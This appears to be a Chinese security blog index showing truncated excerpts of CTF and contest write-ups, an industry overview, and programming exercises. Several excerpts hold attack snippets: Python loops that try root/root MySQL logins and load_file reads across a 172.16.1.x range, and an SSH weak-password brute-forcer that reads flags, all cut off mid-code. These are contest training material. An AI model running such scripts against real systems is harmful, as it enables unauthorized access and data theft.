第一题如下: 用burpsuit设置好代理后,点击发送验证码,可以看到如下: 然后go之后可以看到如下的验证码: 提交验证码后即可获得key 第二题如下: 通过/data/mysql_error_trace.inc,在日志中找到后台登陆地址/miaomiaomiaomiaoaichiyu/login.htm,admin/admin 登陆, 或分析源文件js代码 得到通关密钥.通关密钥为:goodjobboy! 第三题如下: 点击seek可以看到: Seek的hex值就是7365656b,那么我们…

中国网络安全行业分类及全景图2019H1   概述 中国网络安全行业分类及全景图: 一级分类包含了端点安全.网络安全.应用安全.数据安全.身份与访问管理和安全管理六个一级分类,这些一级分类分别对应了网络安全领域的几个核心的问题.同时定义了云.移动.工控.物联网四个场景,与等级保护2.0要求对应.这些场景的出现带来了新的安全问题,也孕育了多个新兴细分市场. 新增了安全可靠和业务安全两个维度,这两个栏目不是分类也不是场景,是在分类与场景之上的另一个维度.无论传统领域还是新场景,或是业务,都需要有服务…

2019年全国大学生网络安全邀请赛暨第五届上海市大学生网络安全大赛 做出了两道Misc== 签到 题干 解题过程 题干提示一直注册成功,如果注册失败也许会出现flag. 下载下来是包含010editor.exe的一堆文件. 打开010editor.exe,想到跟注册有关,于是进入Tools->Register 在弹出的license随便输入用户名和密码 果然,显示注册成功. 想把010editor.exe拖入ollydbg分析,一直不能成功打开,百度查了会儿问题,最后发现好像是因为ollydbg…

友情链接 Web师傅:skyxmao师傅 内心OS 第一次参加这种大型比赛,实力较菜,请师傅们多多指点 Misc | 完成 | 第一 下载文件,看一下doc没有任何问题, 没有发现任何隐写,然后修改文件后缀名docx为zip,解压 将所有解压后的文件打开,用notepad++ 在此全部文件中搜索flag字段,即可找到flag Misc | 完成 | BBQ 庞大的base64,使用Notepad++ 相信大家一眼就能看到是base64文件隐写流(可能不准确) 这里推荐一手脚本 def get_b…

MySQL读文件 #coding=utf-8 import MySQLdb host = '172.16.1.' for i in range(129,131): tag = host+str(i) print tag+"3306" try: MySQLdb.connect(tag,3306,'root','root','mysql',timeout=1) cur = conn.cursor() cur.execute("select load_file('/root/fla…

自动爆破SSH弱口令+读取Flag #coding=utf-8 import paramiko sshc = paramiko.SSHClient() sshc.set_missing_host_key_policy(paramiko.AutoAddPolicy()) host = "172.16.1." for i in range(120,131): tag = host+str(i) print tag try: try: sshc.connect(tag,22,',timeou…

Base64加解密: ubuntu@VM-0-5-ubuntu:~$ echo iloveyou | base64aWxvdmV5b3UKubuntu@VM-0-5-ubuntu:~$ echo aWxvdmV5b3UK | base64 -diloveyou MD5加解密: ubuntu@VM-0-5-ubuntu:~$ opensslOpenSSL> md5iloveyou #这里按三次ctrl+d(stdin)= f25a2fc72690b780b2a14e140ef6a9e0 文件包含读…

DEMO: #coding=utf-8 import MySQLdb class MSSQL: def __init__(self,host,user,pwd): self.host = host self.user = user self.pwd = pwd def connect_dp(self): conn = MySQLdb.connect(host=self.host,port=Flag3, user=Flag4,passwd=self.pwd,db='mysql',) cur = c…

挑战任务 “绿盟杯”比赛过后,赛事承办方的各位工作人员们就开始分头统计各个参赛队伍和同学的成绩了.赛事规模很大,有10000个队伍参加.经过工作人员认真负责的统计,本来已经统计好了这一万个队伍的分数和排名,并按照排名从高到低依次进行了编号(从1到10000)但是由于一个非常偶然的因素,导致其中三个编号的数据丢失,而且剩余编号的顺序也全被打乱了. 你需要编写一个程序,根据还保留的统计数据,来判断哪些编号的数据丢失了,并将这些编号按照从小到大的顺序重新拼接为一个新数字,然后计算这个新数字除以11的余…

挑战任务 我们吃的食物都有保质期,现在食品监督管理局想要制作一个能准确计算食品过期日期的小程序,需要请你来进行设计. 例如:A食品在2018年1月1日生产,保质期是20天,则它的过期日期在2018年1月21日. 编程要求 补全函数string getDate(string releaseDate,int day)其中releaseDate表示食品出厂日期day表示保质期,请根据传入的数据计算食品的过期日期,格式为yyyy-mm-dd即4位年份2位月份2位日期.比如:2015-02-19 请严格按…